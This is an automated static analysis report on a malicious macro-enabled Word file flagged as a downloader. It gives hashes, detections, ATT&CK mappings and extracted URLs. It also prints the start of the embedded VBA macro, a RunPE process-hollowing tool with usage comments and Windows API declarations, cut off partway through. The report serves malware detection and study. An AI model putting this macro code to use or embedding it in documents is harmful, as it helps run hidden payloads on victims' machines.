Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d8b4b6397d126b03…

MALICIOUS

Office (OOXML)

Size: 37.8 KB
Created: 2021-09-08 06:55:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-09-17
MD5: 4346f1e65b7f49ce669e4c8b3c2691f9
SHA-1: 6e1d46ee98097b0cc16fc5ffad0f9335853f1f3b
SHA-256: d8b4b6397d126b03311450b0a511c89921668fe3aa51dfae1d79416997ef9dca
Risk score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is an OOXML (Word) document containing a VBA project. The extracted macro source is a RunPE implementation: its header comments match the public VBA-RunPE project (https://github.com/itm4n/VBA-RunPE), and it imports the Windows API functions (CreateProcess, GetThreadContext, WriteProcessMemory, SetThreadContext, ResumeThread) needed to run an embedded executable inside a newly created process. Such a macro is typically used to execute a secondary payload, indicating downloader or dropper functionality. The ClamAV detection 'Doc.Downloader.Valyria-10004543-0' further supports this assessment.

Heuristics (3)

  • ClamAV: Doc.Downloader.Valyria-10004543-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10004543-0
  • VBA project inside OOXML [medium] OOXML_VBA
    Document contains a VBA project (VBA macros present).
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the URLs below were found in document text (OOXML body / shared strings):
    • https://github.com/itm4n/VBA-RunPE
    • https://github.com/hasherezade/
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspx
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspx
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspx
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspx
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.html
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspx
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspx
    • https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.html
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms679284(v=vs.85).aspx

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 27599 bytes
SHA-256: 7c3a1e077ece06f1aac55aab32b41e26872a07a37b16511b71c3f35e8413daa0
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
' --------------------------------------------------------------------------------
' Title: VBA RunPE
' Filename: RunPE.vba
' GitHub: https://github.com/itm4n/VBA-RunPE
' Date: 2019-12-14
' Author: Clement Labro (@itm4n)
' Description: A RunPE implementation in VBA with Windows API calls. It is
'   compatible with both 32 bits and 64 bits versions of Microsoft Office.
'   The 32 bits version of Office can only run 32 bits executables and the 64 bits
'   version can only run 64 bits executables.
' Usage: 1. In the 'Exploit' procedure at the end of the code, set the path of the
'               file you want to execute (with optional arguments)
'        2. Enable View > Immediate Window (Ctrl + G) (to check execution and error
'               logs)
'        3. Run the macro!
' Tested on: - Windows 7 Pro 64 bits + Office 2016 32 bits
'            - Windows 10 Pro 64 bits + Office 2016 64 bits
' Credit: @hasherezade - https://github.com/hasherezade/ (RunPE written in C++
'   with dynamic relocations)
' --------------------------------------------------------------------------------

Option Explicit

' ================================================================================
'                      ~~~ IMPORT WINDOWS API FUNCTIONS ~~~
' ================================================================================
#If Win64 Then
    Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
    Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
    Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
    Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
    Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
    Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
    Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
    Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
    Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Lon
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 69632 bytes
SHA-256: 7d73088bb16aecfedbe6fef28cd7bb1f8f6b8a89b440e3bba3557a1752eb1458
Detection: ClamAV: Doc.Downloader.Valyria-10004543-0
Obfuscation or payload: unlikely